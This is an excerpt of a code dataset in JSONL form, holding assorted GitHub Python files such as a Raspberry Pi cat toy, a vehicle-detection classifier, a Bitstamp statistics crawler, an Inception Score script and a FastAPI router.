port=5000)","repo_name":"jason407891/fifth-team-weather","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29944405407","text":"\ndef min_removals(txt1, txt2):\n  x=list(txt1)\n  y=list(txt2)\n  y.sort()\n  d=\"\".join(y)\n  e=\"\".join(x)\n  z=[]\n  for i in range(len(x)):\n    if x[i] in y:\n      z.append(x[i])\n  a=(\"\".join(z))\n  b=d.strip(a)\n  c=e.strip(a)\n  return(len(b)+len(c))\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"KYGpco9NFmJRyMQqj_14.py","file_name":"KYGpco9NFmJRyMQqj_14.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38594415319","text":"import RPi.GPIO as GPIO\nimport time\nimport random\nrandom.seed()\n\n#set pins\nGPIO.setmode (GPIO.BOARD)\nGPIO.setwarnings (False)\nGPIO.setup (11, GPIO.OUT) #laser power\nGPIO.setup (13, GPIO.OUT) #X-servo\nGPIO.setup (15, GPIO.OUT) #Y-servo\nGPIO.setup (19, GPIO.IN, 
pull_up_down=GPIO.PUD_UP) #in from IR\n\n#setup servo pwm\np = GPIO.PWM (13, 50)\nq = GPIO.PWM (15, 50)\n\n#set both servos to center to start\np.start (7.5)\nq.start (7.5)\n\ndef moveServos():\n \"Turns on laser and moves X- and Y-servos randomly\"\n lightLaser ()\n\n p.ChangeDutyCycle (random.randint (8, 12))\n time.sleep (random.random())\n q.ChangeDutyCycle (random.randint (8, 12))\n time.sleep (random.random())\n\n p.ChangeDutyCycle (random.randint (3, 5))\n time.sleep (random.random())\n q.ChangeDutyCycle (random.randint (3, 5))\n time.sleep (random.random())\n\n dimLaser ()\n\ndef lightLaser():\n GPIO.output (11, 1)\n\ndef dimLaser():\n GPIO.output (11, 0)\n\n#main loop\nwhile True:\n #check for input from sensor\n if GPIO.input (19):\n moveServos()\n time.sleep (0.5) #wait a half sec before polling sensor\n else:\n dimLaser()\n time.sleep (0.5)\n","repo_name":"Apress/Learn-Rasp-Pi-Program-Python","sub_path":"Chapter9/cat_toy.py","file_name":"cat_toy.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"32"} +{"seq_id":"37308223913","text":"import torch\nfrom torch.distributed import barrier\nimport os\n\nfrom cmdline import *\nfrom atlas import *\n\noasis_ds_std = OASISDataset(crop=None,\n h5path=f'{prefix}convaffinestd_{suffix}.h5',\n pooling=None,\n one_scan_per_subject=False)\noasis_ds_test_std = OASISDataset(crop=None,\n h5path=f'{prefix}convaffinestd_test_{suffix}.h5',\n pooling=None,\n one_scan_per_subject=False)\n\ndeepaffinefile = f'{prefix}deepaffine_{suffix}.pth'\nI_deepaffine, affine_net, epoch_losses_deepaffine, full_losses_deepaffine, \\\n iter_losses_deepaffine, test_losses_deepaffine \\\n = torch.load(deepaffinefile, map_location=loc)\nI_deepaffine = I_deepaffine.to(loc)\n\nfluid_params = [.1,0,.01]\nreg_weight = 1e4\n\nif rank == 0: torch.save(fluid_params, f'{prefix}fluidparams_{suffix}.pth')\nconvlddmmfile = f'{prefix}convlddmm_{suffix}.pth'\nif not os.path.isfile(convlddmmfile): # conventional lddmm atlas\n print(\"Conventional LDDMM atlas building\")\n res = lddmm_atlas(dataset=oasis_ds_std,\n I0=I_deepaffine.clone().to('cuda'),\n fluid_params=fluid_params,\n learning_rate_pose=1e-3,\n learning_rate_image=5e4,\n reg_weight=reg_weight,\n momentum_preconditioning=False,\n batch_size=30,\n num_epochs=500,\n gpu=gpu,\n world_size=args.world_size,\n rank=rank)\n if rank == 0: torch.save(res, convlddmmfile)\nelse:\n torch.load(convlddmmfile, map_location='cpu')\nbarrier()\nIlddmm, _, _, _ = res\nIlddmm = Ilddmm.to(loc)\n\n# On the test set, use same atlas-building code but with zero learning rate for\n# the image\nconvlddmmtestfile = f'{prefix}convlddmm_test_{suffix}.pth'\nif not os.path.isfile(convlddmmtestfile): # conventional lddmm atlas\n print(\"Conventional LDDMM Test\")\n res = lddmm_atlas(dataset=oasis_ds_test_std,\n I0=Ilddmm,\n fluid_params=fluid_params,\n learning_rate_pose=1e-3,\n learning_rate_image=0e4,\n momentum_preconditioning=False,\n reg_weight=reg_weight,\n batch_size=30,\n num_epochs=1,\n lddmm_steps=500,\n gpu=gpu,\n world_size=args.world_size,\n rank=rank)\n if rank == 0: torch.save(res, convlddmmtestfile)\n del res\n#Ilddmm, mom_lddmm, epoch_losses, iter_losses = torch.load(convlddmmtestfile,\n 
#map_location=loc)\n","repo_name":"jacobhinkle/diffeomorphic_autoencoders","sub_path":"run_convlddmm.py","file_name":"run_convlddmm.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"25461703327","text":"import pygame\nfrom GObject import GObject, Constants\nfrom text import Text\nfrom graph import Graph\n\n\nclass ControlPanel(GObject):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.width = 300\n self.image = pygame.Surface((self.width, Constants.HEIGHT.value))\n self.image.set_alpha(100)\n self.image.fill(Constants.WHITE.value)\n self.rect = self.image.get_rect()\n self.rect.right = Constants.WIDTH.value\n self.rect.bottom = Constants.HEIGHT.value\n # GObject.all_objects.add(self)\n GObject.control_panel.add(self)\n\n self.population_graph = Graph(y=GObject.current_population_list,\n x=GObject.duration_cell_list,\n size=(250, 150))\n self.population_graph.rect.centerx, self.population_graph.rect.top = (Constants.WIDTH.value - 150, 20)\n self.population_graph.color = Constants.RED.value\n self.population_graph.xlabel.text = 'Frames'\n self.population_graph.ylabel.text = 'Count of cells'\n\n self.current_food_graph = Graph(y=GObject.current_food_list,\n x=GObject.duration_food_list,\n size=(250, 150))\n self.current_food_graph.rect.centerx = Constants.WIDTH.value - 150\n self.current_food_graph.rect.top = self.population_graph.rect.bottom + 40\n self.current_food_graph.color = Constants.BLUE.value\n self.current_food_graph.xlabel.text = 'Frames'\n self.current_food_graph.ylabel.text = 'Count of food'\n\n self.count_of_extinction = Text(30)\n self.fps = Text(30)\n self.duration = Text(30)\n self.current_food = Text(30)\n self.total_food = Text(30)\n self.current_population = Text(30)\n self.total_born = Text(30)\n\n def update(self):\n self.count_of_extinction.update(text=f'Count of extinction: {GObject.count_of_extinction}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 210),\n color=Constants.BLACK.value)\n self.duration.update(text=f'Duration: {GObject.duration // 60}m or {GObject.duration // 3600}h',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 180),\n color=Constants.BLACK.value)\n self.fps.update(text=f'FPS: {GObject.fps}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 150),\n color=Constants.BLACK.value)\n self.current_food.update(text=f'Current food: {len(GObject.food)}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 120),\n color=Constants.BLACK.value)\n self.total_food.update(text=f'Total food: {GObject.count_of_food_ever}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 90),\n color=Constants.BLACK.value)\n self.current_population.update(text=f'Current population: {len(GObject.cells)}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 60),\n color=Constants.BLACK.value)\n self.total_born.update(text=f'Total born: {GObject.count_of_cells_ever}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 30),\n color=Constants.BLACK.value)\n self.population_graph.update()\n self.current_food_graph.update()\n\n def draw(self):\n pygame.display.get_surface().blit(self.image, (self.rect.x, self.rect.y))\n self.count_of_extinction.draw()\n self.duration.draw()\n self.fps.draw()\n self.current_food.draw()\n self.total_food.draw()\n self.current_population.draw()\n self.total_born.draw()\n self.population_graph.draw()\n 
self.current_food_graph.draw()\n","repo_name":"vallenov/TheLittleLife","sub_path":"control_panel.py","file_name":"control_panel.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24094968130","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 22 07:40:04 2017\n\n@author: jerome\n\"\"\"\n\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport glob\nimport time\nimport pickle\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import StandardScaler\nfrom skimage.feature import hog\nfrom lesson_functions import *\nfrom find_object import *\n# NOTE: the next import is only valid for scikit-learn version <= 0.17\n# for scikit-learn >= 0.18 use:\nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split\nfrom sklearn.model_selection import GridSearchCV\n# Define a function to extract features from a single image window\n# This function is very similar to extract_features()\n# just for a single image rather than list of images\ndef single_img_features(img, color_space='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True): \n #1) Define an empty list to receive features\n img_features = []\n #2) Apply color conversion if other than 'RGB'\n if color_space != 'RGB':\n if color_space == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n elif color_space == 'SVCb':\n feature_image1 = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n feature_image2 = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n feature_image3 = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n feature_image = np.dstack((feature_image1[:,:,2],feature_image2[:,:,2],feature_image3[:,:,2]))\n else: feature_image = np.copy(img) \n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n #4) Append features to list\n img_features.append(spatial_features)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(feature_image, nbins=hist_bins)\n #6) Append features to list\n img_features.append(hist_features)\n #7) Compute HOG features if flag is set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.extend(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True)) \n else:\n hog_features = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n #8) Append features to list\n img_features.append(hog_features)\n\n #9) Return concatenated array of features\n return np.concatenate(img_features)\n\n# Define a function you will pass an image \n# and the list of windows to be searched (output of slide_windows())\ndef search_windows(img, windows, clf, scaler, color_space='RGB', \n spatial_size=(32, 32), hist_bins=32, \n 
hist_range=(0, 256), orient=9, \n pix_per_cell=8, cell_per_block=2, \n hog_channel=0, spatial_feat=True, \n hist_feat=True, hog_feat=True):\n\n #1) Create an empty list to receive positive detection windows\n on_windows = []\n #2) Iterate over all windows in the list\n for window in windows:\n #3) Extract the test window from original image\n test_img = cv2.resize(img[window[0][1]:window[1][1], window[0][0]:window[1][0]], (64, 64)) \n #4) Extract features for that window using single_img_features()\n features = single_img_features(test_img, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n #5) Scale extracted features to be fed to classifier\n test_features = scaler.transform(np.array(features).reshape(1, -1))\n #6) Predict using your classifier\n prediction = clf.predict(test_features)\n #7) If positive (prediction == 1) then save the window\n if prediction == 1:\n on_windows.append(window)\n #8) Return windows for positive detections\n return on_windows\n\n# Read in cars and notcars from large dataset\ncars = glob.glob('./dataset/vehicles/*/*.png')\nnotcars = glob.glob('./dataset/non-vehicles/*/*.png')\n\n### TODO: Tweak these parameters and see how the results change.\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\norient = 9 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = \"ALL\" # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (16, 16) # Spatial binning dimensions\nhist_bins = 16 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\ny_start_stop = [None, None] # Min and max in y to search in slide_window()\n\ncar_features = extract_features(cars, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\nnotcar_features = extract_features(notcars, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n\nX = np.vstack((car_features, notcar_features)).astype(np.float64) \n# Fit a per-column scaler\nX_scaler = StandardScaler().fit(X)\n# Apply the scaler to X\nscaled_X = X_scaler.transform(X)\n\n# Define the labels vector\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(notcar_features))))\n\n#############\n# Parameter Estimation for SVM\n#X_train, X_test, y_train, y_test = train_test_split(\n# scaled_X, y, test_size=0.5, random_state=0)\n# Set the dataset in two equal parts\n#tuned_parameters = [{'kernel':['rbf'], 'gamma':[1e-3,1e-4], 'C': [1,10,100,1000]},\n# {'kernel':['linear'], 'C': [1,10,100,1000]}]\n#clf = GridSearchCV(SVC(C=1), tuned_parameters, cv=5)\n#clf.fit(X_train,y_train)\n#print(clf.best_params_)\n\n# Split up data into randomized training and test sets\nrand_state = np.random.randint(0, 100)\nX_train, X_test, y_train, y_test = train_test_split(\n scaled_X, y, test_size=0.2, random_state=rand_state)\n\nprint('Using:',orient,'orientations',pix_per_cell,\n 'pixels per cell and', 
cell_per_block,'cells per block')\nprint('Feature vector length:', len(X_train[0]))\n# Use a linear SVC \nsvc = LinearSVC()\n# Check the training time for the SVC\nt=time.time()\nsvc.fit(X_train, y_train)\nt2 = time.time()\nprint(round(t2-t, 2), 'Seconds to train SVC...')\n# Check the score of the SVC\nprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\n# Check the prediction time for a single sample\n\nf = open(\"svc_pickle.p\", \"wb\" )\nparams ={\"svc\":svc, \"scaler\":X_scaler, \"orient\":orient, \"pix_per_cell\":pix_per_cell, \"cell_per_block\":cell_per_block, \n \"spatial_size\":spatial_size, \"hist_bins\":hist_bins}\npickle.dump(params, f)\nf.close()\n\nt=time.time()\n\nimg = mpimg.imread('test_images/test1.jpg')\n\nystart = 400\nystop = 656\n \nheat = np.zeros_like(img[:,:,0]).astype(np.float)\n\nbox_list = []\n\nfor scale in np.arange(0.5,2,0.2) :\n box_list = find_cars(img,box_list, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins)\n\n# Add heat to each box in box list\nheat = add_heat(heat,box_list)\n \n# Apply threshold to help remove false positives\nheat = apply_threshold(heat,10) # 20 was best\n\n# Visualize the heatmap when displaying \nheatmap = np.clip(heat, 0, 255)\n\n# Find final boxes from heatmap using label function\nlabels = label(heatmap)\ndraw_img = draw_labeled_bboxes(np.copy(img), labels)\n\nplt.imshow(heatmap)\n","repo_name":"Jaeyong-Han/Self-Driving-Car_Nanodegree","sub_path":"CarND-Project5_Vehicle-Detection/search_classify.py","file_name":"search_classify.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73187922330","text":"import json\nimport logging\nimport os\nimport time\nfrom typing import Any, Dict, List, Optional\n\nimport requests\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef merge_data(prev: List[Dict[str, Any]], curr: List[Dict[str, Any]]) -> List[Dict[str, Any]]:\n '''Merge curr into prev, the element in list must have a date field.'''\n for c in curr:\n x: Optional[Dict[str, Any]] = None\n for p in prev:\n if p['date'] == c['date']:\n x = p\n break\n if x is None:\n prev.append(c)\n else:\n x.update(c)\n return sorted(prev, key=lambda d: d['date'])\n\n\ndef http_get(url: str, field_name: str) -> List[Dict[str, Any]]:\n resp = requests.get(url=url)\n if resp.status_code == 200:\n data = resp.json()\n return data[field_name]\n else:\n logging.warning(f'{url} {resp.status_code} {resp.text}')\n if resp.status_code == 429:\n exit(0)\n return []\n\n\ndef get_coins() -> List[str]:\n url = 'https://www.bitstamp.net/api/v2/trading-pairs-info/'\n resp = requests.get(url=url)\n if resp.status_code == 200:\n symbols = resp.json()\n coins = [s['name'].split('/')[0].lower() for s in symbols]\n coins = sorted(list(set(coins)))\n return coins\n else:\n logging.warning(f'{url} {resp.status_code} {resp.text}')\n if resp.status_code == 429:\n exit(0)\n return []\n\n\ndef get_price(coin: str) -> None:\n url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/financial/price'\n curr = http_get(url=url, field_name='price')\n file_path = f'./data/price-{coin}.json'\n if os.path.exists(file_path):\n with open(file_path, 'rt') as f_in:\n prev = json.loads(f_in.read())\n else:\n prev = []\n prev = merge_data(prev, curr)\n with open(file_path, 'wt') as f_out:\n json.dump(prev, f_out, indent=2)\n\n\ndef get_transactions(coin: str) -> None:\n url = 
f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/network/transactions'\n    curr = http_get(url=url, field_name='txsStats')\n    file_path = f'./data/transactions-{coin}.json'\n    if os.path.exists(file_path):\n        with open(file_path, 'rt') as f_in:\n            prev = json.loads(f_in.read())\n    else:\n        prev = []\n    prev = merge_data(prev, curr)\n    with open(file_path, 'wt') as f_out:\n        json.dump(prev, f_out, indent=2)\n\n\ndef get_addresses(coin: str) -> None:\n    url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/network/addresses'\n    curr = http_get(url=url, field_name='addressesStats')\n    file_path = f'./data/addresses-{coin}.json'\n    if os.path.exists(file_path):\n        with open(file_path, 'rt') as f_in:\n            prev = json.loads(f_in.read())\n    else:\n        prev = []\n    prev = merge_data(prev, curr)\n    with open(file_path, 'wt') as f_out:\n        json.dump(prev, f_out, indent=2)\n\n\ndef get_large_transactions(coin: str) -> None:\n    url = f'https://www.bitstamp.net/api-internal/stats/v1/{coin}/financial/large_transactions'\n    file_path = f'./data/large_transactions-{coin}.json'\n    curr = http_get(url=url, field_name='largeTxs')\n    if os.path.exists(file_path):\n        with open(file_path, 'rt') as f_in:\n            prev = json.loads(f_in.read())\n    else:\n        prev = []\n    prev = merge_data(prev, curr)\n    with open(file_path, 'wt') as f_out:\n        json.dump(prev, f_out, indent=2)\n\n\nif __name__ == \"__main__\":\n    # // 8000 requests per 10 minutes, see `REQUEST LIMITS` at https://www.bitstamp.net/api/\n    cooldown_time = 0.075\n    coins = get_coins()\n    for coin in coins:\n        logging.info(coin)\n        get_price(coin)\n        time.sleep(cooldown_time)\n        get_transactions(coin)\n        time.sleep(cooldown_time)\n        get_addresses(coin)\n        time.sleep(cooldown_time)\n        get_large_transactions(coin)\n        time.sleep(cooldown_time)\n","repo_name":"crypto-crawler/bitstamp-insights","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"74190914652","text":"'''\n1. Split on spaces and store the pieces in a list: str.split()\n2. list[i] %2 == 0 : upper\n3. list[i] %2 != 0 : lower\n'''\n\ndef solution(s):\n    answer = ''\n    new_list = s.split(' ')\n    for i in new_list:\n        for j in range(len(i)):\n            if j%2==0:\n                answer += i[j].upper()\n            else:\n                answer += i[j].lower()\n        answer += ' '\n    return answer[0:-1]\n    \n    \n\nprint(solution(\"try hello world\"))","repo_name":"dayowoo/Algorithm-Study","sub_path":"programmers/Level1/이상한 문자 만들기.py","file_name":"이상한 문자 만들기.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24473868260","text":"import sqlite3\nimport mutagen\n\n\nclass Album:\n    def __init__(self, db_path):\n        self.db_path = db_path\n        self.conn = sqlite3.connect(self.db_path)\n        self.cur = self.conn.cursor()\n\n    # def __del__(self):\n    #     self.conn.close()\n\n    def add_album(self, title, artist_name):\n        self.cur.execute(\"SELECT id FROM artist WHERE name = ?\", (artist_name,))\n        artist_id = self.cur.fetchone()\n        if not artist_id:\n            self.cur.execute(\"INSERT INTO artist (name) VALUES (?)\", (artist_name,))\n            artist_id = self.cur.lastrowid\n        else:\n            artist_id = artist_id[0]\n        self.cur.execute(\"INSERT INTO album (title, artist_id) VALUES (?, ?)\", (title, artist_id))\n        self.conn.commit()\n\n    def delete_album(self, album_id):\n        self.cur.execute(\"DELETE FROM album WHERE id = ?\", (album_id,))\n        self.conn.commit()\n\n    def modify_tag(self, album_id, field, value):\n        self.cur.execute(\"SELECT filename FROM library WHERE album_id = ?\", (album_id,))\n        filenames = self.cur.fetchall()\n        for filename in filenames:\n            try:\n                audio = mutagen.File(filename[0])\n                if audio:\n                    audio[field] = value\n                    audio.save()\n            except Exception as e:\n                print(f\"Error modifying tag for {filename[0]}: {e}\")\n\n    def show(self, album_id):\n        self.cur.execute(\n            \"SELECT album.title, artist.name FROM album JOIN artist ON album.artist_id = artist.id WHERE album.id = ?\",\n            (album_id,))\n        row = self.cur.fetchone()\n        if row:\n            print(f\"Album: {row[0]}\")\n            print(f\"Artist: {row[1]}\")\n        self.cur.execute(\"SELECT title, artist, duration, genre FROM library WHERE album_id = ?\", (album_id,))\n        rows = self.cur.fetchall()\n        for row in rows:\n            print(row)\n","repo_name":"kandriadze/cli_id3","sub_path":"Album.py","file_name":"Album.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13642561739","text":"'''\nFrom https://github.com/tsc2017/Inception-Score\nCode derived from https://github.com/openai/improved-gan/blob/master/inception_score/model.py and https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/gan/python/eval/python/classifier_metrics_impl.py\n\nUsage:\n    Call get_inception_score(images, splits=10)\nArgs:\n    images: A numpy array with values ranging from 0 to 255 and shape in the form [N, 3, HEIGHT, WIDTH] where N, HEIGHT and WIDTH can be arbitrary. 
\n dtype of the images is recommended to be np.uint8 to save CPU memory.\n splits: The number of splits of the images, default is 10.\nReturns:\n Mean and standard deviation of the Inception Score across the splits.\n'''\n\nimport os, sys\nimport functools\nimport time\nimport argparse\nfrom tqdm import tqdm\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import functional_ops\ntfgan = tf.contrib.gan\n\n\nclass InceptionScore():\n def __init__(self, batch_size, name):\n self.batch_size = batch_size \n self.inception_images = tf.placeholder(tf.float32, [self.batch_size, 3, None, None])\n self.logits = self.inception_eval(name)\n\n def inception_eval(self, name):\n images = self.inception_images\n images = tf.transpose(images, [0, 2, 3, 1])\n size = 299\n images = tf.image.resize_bilinear(images, [size, size])\n generated_images_list = array_ops.split(images, num_or_size_splits=1)\n logits = functional_ops.map_fn(\n fn = functools.partial(tfgan.eval.run_inception, output_tensor=name),\n elems = array_ops.stack(generated_images_list),\n parallel_iterations = 1,\n back_prop = False,\n swap_memory = True,\n name = 'RunClassifier')\n logits = array_ops.concat(array_ops.unstack(logits), 0)\n return logits\n\n def get_inception_probs(self, sess, inps):\n n_batches = len(inps) // self.batch_size\n preds = np.zeros([n_batches * self.batch_size, 1000], dtype=np.float32)\n for i in tqdm(range(n_batches)):\n inp = inps[i * self.batch_size : (i + 1) * self.batch_size] / 127.5 - 1\n preds[i * self.batch_size : (i + 1) * self.batch_size] = sess.run(self.logits, feed_dict={self.inception_images: inp})[:, :1000]\n preds = np.exp(preds) / np.sum(np.exp(preds), 1, keepdims=True)\n return preds\n\n def preds2score(self, preds):\n scores = []\n splits = 1\n for i in range(splits):\n part = preds[(i * preds.shape[0] // splits):((i + 1) * preds.shape[0] // splits), :]\n kl = part * (np.log(part) - np.log(np.expand_dims(np.mean(part, 0), 0)))\n kl = np.mean(np.sum(kl, 1))\n scores.append(np.exp(kl))\n return np.mean(scores), np.std(scores)\n\n def get_inception_score(self, images):\n assert(type(images) == np.ndarray)\n assert(len(images.shape) == 4)\n assert(images.shape[1] == 3)\n assert(np.min(images[0]) >= 0 and np.max(images[0]) > 10), 'Image values should be in the range [0, 255]'\n print('Calculating Inception Score with %i images in %i splits' % (images.shape[0], 1))\n start_time = time.time()\n with tf.Session() as sess:\n preds = self.get_inception_probs(sess, images)\n mean, std = self.preds2score(preds)\n print('Inception Score calculation time: %f s' % (time.time() - start_time))\n return mean, std # Reference values: 11.34 for 49984 CIFAR-10 training set images, or mean=11.31, std=0.08 if in 10 splits.\n\ndef get_images_from_files(path):\n import cv2\n #images = np.empty(shape=[50000, 3, 32, 32], dtype=np.uint8) # CIFAR10\n #images = np.empty(shape=[100000, 3, 48, 48], dtype=np.uint8) # STL10 (unlabeled, resized)\n images = np.empty(shape=[50000, 3, 48, 48], dtype=np.uint8) # STL10 (generated)\n idx = 0\n for root, dir, files in os.walk(path):\n for file in files:\n if file.endswith(tuple(['.jpg', '.png', 'bmp'])):\n image_path = os.path.join(root, file)\n img = cv2.imread(image_path)\n img = img[:, :, (2, 1, 0)] # BGR to RGB \n img = np.transpose(img, (2, 0, 1)) # RGB, H, W \n images[idx] = img\n idx += 1\n if idx >= images.shape[0]:\n break\n print('images.shape: {}'.format(images.shape))\n return images\n\nif __name__ == 
'__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', help='comma separated GPU list to use')\n parser.add_argument('--data_dir', help='path to data folder')\n args = parser.parse_args()\n\n if args.gpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu \n\n images = get_images_from_files(args.data_dir) \n mean, std = InceptionScore(64, 'logits:0').get_inception_score(images)\n print('IS: ', mean, std)\n\n # images = get_images_from_files(args.data_dir)\n # with tf.Session() as sess:\n # preds = InceptionScore(100, 'pool_3:0').get_inception_probs(sess, images)\n # #np.save('/home/minje/dev/dataset/cifar/cifar10_inception_pool_3.npy', preds)\n # np.save('/home/minje/dev/dataset/stl/stl_unlabeled_inception_pool_3.npy', preds)\n \n\n","repo_name":"swotr/snwgan","sub_path":"IS/inception_score.py","file_name":"inception_score.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5168009945","text":"\"\"\"see https://adventofcode.com/2022/day/1\"\"\"\r\n\r\nfrom argparse import ArgumentParser\r\nfrom typing import Iterator\r\n\r\ndef make_parser() -> ArgumentParser:\r\n parser = ArgumentParser()\r\n parser.add_argument(\"input\", help=\"input file\")\r\n return parser\r\n\r\ndef split_on(s, seq):\r\n \"\"\"splits seq on s\"\"\"\r\n acc = []\r\n for each in seq:\r\n if each == s:\r\n yield acc\r\n acc = []\r\n else:\r\n acc.append(each)\r\n yield acc\r\n\r\nif __name__ == '__main__':\r\n matches = make_parser().parse_args()\r\n with open(matches.input, 'r') as fptr:\r\n input = fptr.readlines()\r\n nums = [int(l) if l.strip().isnumeric() else None for l in input]\r\n elves_split: list[list[int]] = list(split_on(None, nums))\r\n cals: list[int] = list(map(sum, elves_split))\r\n print(max(cals))\r\n cals.sort(reverse=True)\r\n top_3: list[int] = cals[:3]\r\n print(f\"top 3: {top_3}\")\r\n print(f\"total of top 3: {sum(top_3)}\")","repo_name":"vernonrj/advent2022","sub_path":"day01/puzzle01.py","file_name":"puzzle01.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10071086313","text":"from typing import List\nfrom uuid import UUID\n\nfrom fastapi import Depends\nfrom fastapi_utils.cbv import cbv\nfrom fastapi_utils.inferring_router import InferringRouter\nfrom fastapi_utils.api_model import APIMessage\n\nfrom ..services import OrderItemService\nfrom ..schemas import (\n OrderItemCreate, OrderItemUpdate, OrderItemGet,\n)\nfrom .base_api import BaseAPI\n\nrouter = InferringRouter()\n\n\n# noinspection PyTypeChecker\n@cbv(router)\nclass OrderItemAPI(BaseAPI):\n service: OrderItemService = Depends()\n\n @router.get('/')\n async def get_many(\n self, offset: int = 0, limit: int = 20,\n order_uid: UUID = None\n ) -> List[OrderItemGet]:\n return await self._get_many(\n limit, offset, order_uid=order_uid\n )\n\n @router.get(\"/{uid}/\")\n async def get_one(\n self, uid: UUID\n ) -> OrderItemGet:\n return await self._get_one(uid)\n\n @router.post(\"/\")\n async def create_one(\n self, obj: OrderItemCreate\n ) -> OrderItemGet:\n return await self._create_one(obj)\n\n @router.put(\"/{uid}/\")\n async def update_one(\n self, uid: UUID, obj: OrderItemUpdate\n ) -> OrderItemGet:\n return await self._update_one(obj, uid)\n\n @router.delete(\"/{uid}/\")\n async def delete_one(\n self, uid: UUID\n ) -> APIMessage:\n return await 
